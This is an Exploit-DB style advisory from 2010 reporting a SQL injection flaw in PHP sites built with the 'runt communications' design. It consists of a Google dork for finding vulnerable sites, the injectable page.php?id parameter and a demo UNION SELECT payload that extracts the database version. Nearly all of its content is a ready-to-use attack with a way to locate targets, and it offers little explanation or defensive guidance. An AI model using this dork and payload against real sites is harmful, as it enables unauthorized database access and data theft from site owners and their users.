runt-communications Design - SQL Injection

EDB-ID:

12707

CVE:

N/A

Author:

XroGuE

Type:

webapps

Platform:

PHP

Published:

2010-05-23

=========================================================
runt-communications Design SQL Injection Vulnerability
=========================================================
##########################################
# Name: runt-communications Design SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: http://runtcommunications.com
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork: intext:Design by: runt communications

[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]

[+] Demo: http://server/spotlight.php?id=-999+union+all+select+version(),2,3,4,5--


##########################################